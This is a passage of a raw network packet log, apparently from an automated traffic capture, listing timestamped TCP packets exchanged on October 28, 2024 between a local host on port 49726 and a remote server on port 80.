                                                                                                                                                              Oct 28, 2024 19:46:23.603105068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603137016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603177071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603210926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603224039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603245020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603291035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603296995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603367090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603399992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603410959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603436947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603472948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603483915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.650245905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.846853018 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.852633953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852721930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852758884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852777004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.852794886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852828979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852840900 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.852884054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852916956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852936029 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.852967024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852999926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853013992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853050947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853085041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853111029 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853118896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853168011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853168964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853204966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853236914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853255987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853305101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853338957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853348970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853373051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853425026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853444099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853478909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853512049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853522062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853545904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853590965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853596926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853631973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853663921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853682041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853698969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853741884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853748083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853782892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853832006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853832960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853867054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853899956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853914022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853934050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853967905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853982925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854003906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854053020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854420900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854526997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854574919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854578972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854612112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854661942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854676962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854710102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854743958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854752064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854778051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854811907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854819059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854863882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854897976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854909897 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854932070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854965925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854975939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855003119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855036020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855048895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855230093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855264902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855271101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855299950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855340004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855379105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855412960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855447054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855460882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855480909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855515003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855529070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855549097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855581999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855592966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855617046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855654001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855667114 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855701923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855736971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855747938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.855770111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.855813026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.856331110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.856364012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.856398106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.856411934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.856434107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.856483936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.959084988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.964981079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965097904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965132952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965154886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965167046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965195894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965217113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965255976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965292931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965306997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965327024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965361118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965377092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965394020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965445042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965445995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965480089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965513945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965529919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965548038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965580940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965599060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965614080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965646982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965663910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965699911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965748072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965771914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965806007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965842009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965854883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965874910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965908051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965915918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.965941906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965992928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.965992928 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966027021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966062069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966078043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966094971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966129065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966135979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966162920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966196060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966213942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966229916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966267109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966280937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966304064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966353893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966694117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966747046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966790915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966799974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966833115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966866970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966883898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966902018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.966947079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.966953993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967003107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967035055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967046976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.967071056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967104912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967118025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.967139006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967171907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967192888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.967206001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967240095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967252970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.967560053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967611074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.967634916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967670918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967720032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.967753887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967786074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967819929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967828989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.967854977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.967900991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.968043089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968096018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968128920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968152046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.968221903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968255997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968274117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.968291044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968324900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968336105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.968359947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968410969 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.968452930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968487024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968519926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968534946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.968554974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968589067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968604088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.968624115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968658924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.968673944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969082117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969115973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969130039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969151020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969202042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969202995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969235897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969270945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969284058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969305992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969351053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969356060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969391108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969425917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969441891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969459057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969494104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969502926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969657898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969691038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969706059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969724894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969774961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970108986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970143080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970176935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970185995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970227957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970262051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970272064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970297098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970330000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970339060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970382929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970416069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970424891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970449924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970484018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970494986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970518112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970551014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970563889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970588923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970622063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970633030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970992088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971025944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971038103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971076965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971112013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971122980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971163034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971194983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971206903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971230984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971281052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971404076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971456051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971489906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971501112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971554995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971586943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971601963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971621990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971654892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971673965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971689939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971736908 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971772909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971806049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971838951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971848965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971873999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971921921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971925974 CET4972680192.168.2.16166.1.160.211
